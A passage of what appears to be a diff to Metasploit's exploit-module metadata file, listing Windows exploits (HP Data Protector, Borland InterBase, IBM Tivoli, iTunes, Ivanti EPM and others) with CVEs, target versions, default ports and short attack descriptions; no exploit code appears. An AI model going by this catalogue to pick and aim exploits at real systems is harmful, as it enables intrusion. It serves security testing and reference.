"description": "This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.", + "references": [ + "CVE-2011-1865", + "OSVDB-73571", + "EDB-17468", + "URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_omniinet_4.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_omniinet_4", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_operations_agent_coda_34": { + "name": "HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow", + "fullname": "exploit/windows/misc/hp_operations_agent_coda_34", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-09", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x34 opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.", + "references": [ + "CVE-2012-2019", + "OSVDB-83673", + "BID-54362", + "ZDI-12-114" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Operations Agent 11.00 / Windows XP SP3", + "HP Operations Agent 11.00 / Windows 2003 SP2" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_operations_agent_coda_34", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_operations_agent_coda_8c": { + "name": "HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow", + "fullname": "exploit/windows/misc/hp_operations_agent_coda_8c", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-09", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x8c opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.", + "references": [ + "CVE-2012-2020", + "OSVDB-83674", + "BID-54362", + "ZDI-12-115" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Operations Agent 11.00 / Windows XP SP3", + "HP Operations Agent 11.00 / Windows 2003 SP2" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_operations_agent_coda_8c", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_ovtrace": { + "name": "HP OpenView Operations OVTrace Buffer Overflow", + "fullname": "exploit/windows/misc/hp_ovtrace", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-08-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50.\n By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-3872", + "OSVDB-39527", + "BID-25255" + ], + "platform": "Windows", + "arch": "", + "rport": 5051, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Advanced Server All English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_ovtrace.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_ovtrace", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hta_server": { + "name": "HTA Web Server", + "fullname": "exploit/windows/misc/hta_server", + "aliases": [], + "rank": 0, + "disclosure_date": "2016-10-06", + "type": "exploit", + "author": [ + "Spencer McIntyre" + ], + "description": "This module hosts an HTML Application (HTA) that when opened will run a\n payload via Powershell. When a user navigates to the HTA file they will\n be prompted by IE twice before the payload is executed.", + "references": [ + "URL-https://www.trustedsec.com/july-2015/malicious-htas/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Powershell x86", + "Powershell x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hta_server.rb", + "is_install_path": true, + "ref_name": "windows/misc/hta_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "screen-effects" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ib_isc_attach_database": { + "name": "Borland InterBase isc_attach_database() Buffer Overflow", + "fullname": "exploit/windows/misc/ib_isc_attach_database", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38607", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Borland InterBase WI-V8.1.0.257", + "Borland InterBase WI-V8.0.0.123", + "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", + "Borland InterBase WI-V7.0.1.1", + "Borland InterBase WI-V6.5.0.28", + "Borland InterBase WI-V6.0.1.6", + "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", + "Borland InterBase WI-V5.5.0.742", + "Borland InterBase WI-V5.1.1.680", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ib_isc_attach_database.rb", + "is_install_path": true, + "ref_name": "windows/misc/ib_isc_attach_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ib_isc_create_database": { + "name": "Borland InterBase isc_create_database() Buffer Overflow", + "fullname": "exploit/windows/misc/ib_isc_create_database", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38606", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Borland InterBase WI-V8.1.0.257", + "Borland InterBase WI-V8.0.0.123", + "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", + "Borland InterBase WI-V7.0.1.1", + "Borland InterBase WI-V6.5.0.28", + "Borland InterBase WI-V6.0.1.6", + "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", + "Borland InterBase WI-V5.5.0.742", + "Borland InterBase WI-V5.1.1.680", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ib_isc_create_database.rb", + "is_install_path": true, + "ref_name": "windows/misc/ib_isc_create_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ib_svc_attach": { + "name": "Borland InterBase SVC_attach() Buffer Overflow", + "fullname": "exploit/windows/misc/ib_svc_attach", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38605", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Borland InterBase WI-V8.1.0.257", + "Borland InterBase WI-V8.0.0.123", + "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", + "Borland InterBase WI-V7.0.1.1", + "Borland InterBase WI-V6.5.0.28", + "Borland InterBase WI-V6.0.1.6", + "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", + "Borland InterBase WI-V5.5.0.742", + "Borland InterBase WI-V5.1.1.680", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ib_svc_attach.rb", + "is_install_path": true, + "ref_name": "windows/misc/ib_svc_attach", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_cognos_tm1admsd_bof": { + "name": "IBM Cognos tm1admsd.exe Overflow", + "fullname": "exploit/windows/misc/ibm_cognos_tm1admsd_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-02", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in IBM Cognos Analytic Server\n Admin service. The vulnerability exists in the tm1admsd.exe component, due to a\n dangerous copy of user controlled data to the stack, via memcpy, without validating\n the supplied length and data. The module has been tested successfully on IBM Cognos\n Express 9.5 over Windows XP SP3.", + "references": [ + "CVE-2012-0202", + "OSVDB-80876", + "BID-52847", + "ZDI-12-101", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21590314" + ], + "platform": "Windows", + "arch": "", + "rport": 5498, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Cognos Express 9.5 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_cognos_tm1admsd_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_director_cim_dllinject": { + "name": "IBM System Director Agent DLL Injection", + "fullname": "exploit/windows/misc/ibm_director_cim_dllinject", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-03-10", + "type": "exploit", + "author": [ + "Bernhard Mueller", + "kingcope", + "juan vazquez " + ], + "description": "This module abuses the \"wmicimsv\" service on IBM System Director Agent 5.20.3\n to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM\n privileges.\n\n In order to accomplish remote DLL injection it uses a WebDAV service as disclosed\n by kingcope on December 2012. Because of this, the target host must have the\n WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically\n started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.", + "references": [ + "CVE-2009-0880", + "OSVDB-52616", + "OSVDB-88102", + "BID-34065", + "URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt", + "URL-https://seclists.org/bugtraq/2012/Dec/5" + ], + "platform": "Windows", + "arch": "", + "rport": 6988, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "IBM System Director Agent 5.20.3 / Windows with WebClient enabled" + ], + "mod_time": "2018-09-15 18:54:45 +0000", + "path": "/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_director_cim_dllinject", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_tsm_cad_ping": { + "name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow", + "fullname": "exploit/windows/misc/ibm_tsm_cad_ping", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-11-04", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.\n By sending a \"ping\" packet containing a long string, an attacker can execute arbitrary code.\n\n NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order\n for the vulnerable code to be reached. This state doesn't appear to be reachable when the\n TSM server is not running. This service does not restart.", + "references": [ + "CVE-2009-3853", + "OSVDB-59632" + ], + "platform": "Windows", + "arch": "", + "rport": 1582, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Tivoli Storage Manager Express 5.3.6.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_tsm_cad_ping", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_tsm_rca_dicugetidentify": { + "name": "IBM Tivoli Storage Manager Express RCA Service Buffer Overflow", + "fullname": "exploit/windows/misc/ibm_tsm_rca_dicugetidentify", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-11-04", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote\n Client Agent service. By sending a \"dicuGetIdentify\" request packet containing a long\n NodeName parameter, an attacker can execute arbitrary code.\n\n NOTE: this exploit first connects to the CAD service to start the RCA service and obtain\n the port number on which it runs. This service does not restart.", + "references": [ + "CVE-2008-4828", + "OSVDB-54232", + "BID-34803" + ], + "platform": "Windows", + "arch": "", + "rport": 1582, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Tivoli Storage Manager Express 5.3.6.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_tsm_rca_dicugetidentify", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_websphere_java_deserialize": { + "name": "IBM WebSphere RCE Java Deserialization Vulnerability", + "fullname": "exploit/windows/misc/ibm_websphere_java_deserialize", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-11-06", + "type": "exploit", + "author": [ + "Liatsis Fotios " + ], + "description": "This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization\n call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows\n remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.", + "references": [ + "CVE-2015-7450", + "URL-https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java", + "URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability", + "URL-https://www.tenable.com/plugins/index.php?view=single&id=87171" + ], + "platform": "Windows", + "arch": "", + "rport": "8880", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "IBM WebSphere 7.0.0.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_websphere_java_deserialize", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/itunes_extm3u_bof": { + "name": "Apple iTunes 10 Extended M3U Stack Buffer Overflow", + "fullname": "exploit/windows/misc/itunes_extm3u_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-21", + "type": "exploit", + "author": [ + "Rh0 ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.\n When opening an extended .m3u file containing an \"#EXTINF:\" tag description,\n iTunes will copy the content after \"#EXTINF:\" without appropriate checking\n from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,\n which allows code execution under the context of the user.\n\n Please note before using this exploit, you must have precise knowledge of the\n victim machine's QuickTime version (if installed), and then select your target\n accordingly.\n\n In addition, even though this exploit can be used as remote, you should be aware\n the victim's browser behavior when opening an itms link. For example,\n IE/Firefox/Opera by default will ask the user for permission before launching the\n itms link by iTunes. Chrome will ask for permission, but also spits a warning.\n Safari would be an ideal target, because it will open the link without any\n user interaction.", + "references": [ + "OSVDB-83220", + "EDB-19322", + "URL-http://pastehtml.com/view/c25uhk4ab.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3", + "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3", + "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3", + "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/itunes_extm3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/itunes_extm3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ivanti_agent_portal_cmdexec": { + "name": "Ivanti EPM Agent Portal Command Execution", + "fullname": "exploit/windows/misc/ivanti_agent_portal_cmdexec", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-06-07", + "type": "exploit", + "author": [ + "James Horseman", + "Zach Hanley", + "Spencer McIntyre" + ], + "description": "This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method\n which will run an attacker-specified string on the remote target as NT AUTHORITY\\SYSTEM.\n This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.", + "references": [ + "CVE-2023-28324", + "URL-https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US", + "URL-https://github.com/horizon3ai/CVE-2023-28324" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2024-11-20 13:51:39 +0000", + "path": "/modules/exploits/windows/misc/ivanti_agent_portal_cmdexec.rb", + "is_install_path": true, + "ref_name": "windows/misc/ivanti_agent_portal_cmdexec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ivanti_avalanche_mdm_bof": { + "name": "Ivanti Avalanche MDM Buffer Overflow", + "fullname": "exploit/windows/misc/ivanti_avalanche_mdm_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-14", + "type": "exploit", + "author": [ + "Ege BALCI egebalci ", + "A researcher at Tenable" + ], + "description": "This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.\n An attacker can send a specially crafted message to the Wavelink Avalanche Manager,\n which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.\n This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.\n The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.\n Upon successful exploitation the attacker gains full access to the target system.\n\n This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.", + "references": [ + "CVE-2023-32560", + "URL-https://www.tenable.com/security/research/tra-2023-27", + "URL-https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1" + ], + "platform": "Windows", + "arch": "x86", + "rport": 1777, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Ivanti Avalanche <= v6.4.0.0" + ], + "mod_time": "2023-09-04 16:46:14 +0000", + "path": "/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/ivanti_avalanche_mdm_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/landesk_aolnsrvr": { + "name": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", + "fullname": "exploit/windows/misc/landesk_aolnsrvr", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-04-13", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n an overly long string to the Alert Service, a buffer is overwritten and arbitrary\n code can be executed.", + "references": [ + "CVE-2007-1674", + "OSVDB-34964", + "URL-http://www.tippingpoint.com/security/advisories/TSRT-07-04.html" + ], + "platform": "Windows", + "arch": "", + "rport": 65535, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Alerting Proxy 2000/2003/XP", + "Alerting Proxy 2003 SP1-2 (NX support)", + "Alerting Proxy XP SP2 (NX support)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/landesk_aolnsrvr.rb", + "is_install_path": true, + "ref_name": "windows/misc/landesk_aolnsrvr", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/lianja_db_net": { + "name": "Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow", + "fullname": "exploit/windows/misc/lianja_db_net", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-22", + "type": "exploit", + "author": [ + "Spencer McIntyre" + ], + "description": "This module exploits a stack buffer overflow in the db_netserver process, which\n is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.", + "references": [ + "CVE-2013-3563", + "OSVDB-93759" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2", + "Lianja SQL 1.0.0RC5.1 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/lianja_db_net.rb", + "is_install_path": true, + "ref_name": "windows/misc/lianja_db_net", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/manageengine_eventlog_analyzer_rce": { + "name": "ManageEngine EventLog Analyzer Remote Code Execution", + "fullname": "exploit/windows/misc/manageengine_eventlog_analyzer_rce", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-07-11", + "type": "exploit", + "author": [ + "xistence " + ], + "description": "This module exploits a SQL query functionality in ManageEngine EventLog Analyzer v10.6\n build 10060 and previous versions. Every authenticated user, including the default \"guest\"\n account can execute SQL queries directly on the underlying Postgres database server. The\n queries are executed as the \"postgres\" user which has full privileges and thus is able to\n write files to disk. This way a JSP payload can be uploaded and executed with SYSTEM\n privileges on the web server. This module has been tested successfully on ManageEngine\n EventLog Analyzer 10.0 (build 10003) over Windows 7 SP1.", + "references": [ + "EDB-38173", + "CVE-2015-7387", + "URL-https://seclists.org/fulldisclosure/2015/Sep/59" + ], + "platform": "Windows", + "arch": "x86", + "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/manageengine_eventlog_analyzer_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/mercury_phonebook": { + "name": "Mercury/32 PH Server Module Buffer Overflow", + "fullname": "exploit/windows/misc/mercury_phonebook", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-12-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack-based buffer overflow in\n Mercury/32 <= v4.01b PH Server Module. This issue is\n due to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.", + "references": [ + "CVE-2005-4411", + "OSVDB-22103", + "BID-16396" + ], + "platform": "Windows", + "arch": "", + "rport": 105, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP0/SP1 English", + "Windows 2000 Pro English ALL" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/mercury_phonebook.rb", + "is_install_path": true, + "ref_name": "windows/misc/mercury_phonebook", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/mini_stream": { + "name": "Mini-Stream 3.0.1.1 Buffer Overflow", + "fullname": "exploit/windows/misc/mini_stream", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-12-25", + "type": "exploit", + "author": [ + "Unknown", + "Ron Henry " + ], + "description": "This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1\n By creating a specially crafted pls file, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2009-5109", + "OSVDB-61341", + "EDB-10745" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 ENG", + "Windows XP SP2 ENG" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/mini_stream.rb", + "is_install_path": true, + "ref_name": "windows/misc/mini_stream", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/mirc_privmsg_server": { + "name": "mIRC PRIVMSG Handling Stack Buffer Overflow", + "fullname": "exploit/windows/misc/mirc_privmsg_server", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-02", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.\n By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG\n command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads\n may be necessary. This module is based on the code by SkD.", + "references": [ + "CVE-2008-4449", + "OSVDB-48752", + "BID-31552", + "EDB-6666" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/mirc_privmsg_server.rb", + "is_install_path": true, + "ref_name": "windows/misc/mirc_privmsg_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/mobile_mouse_rce": { + "name": "Mobile Mouse RCE", + "fullname": "exploit/windows/misc/mobile_mouse_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-09-20", + "type": "exploit", + "author": [ + "h00die", + "CHOKRI HAMMEDI" + ], + "description": "This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol\n to deploy a payload and run it from the server. This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.6.0.4, current at the time of module writing", + "references": [ + "EDB-51010", + "URL-https://mobilemouse.com/" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 9099, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "default" + ], + "mod_time": "2022-09-27 14:51:03 +0000", + "path": "/modules/exploits/windows/misc/mobile_mouse_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/mobile_mouse_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/ms07_064_sami": { + "name": "MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow", + "fullname": "exploit/windows/misc/ms07_064_sami", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-12-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the DirectShow Synchronized\n Accessible Media Interchanged (SAMI) parser in quartz.dll. This module\n has only been tested with Windows Media Player (6.4.09.1129) and\n DirectX 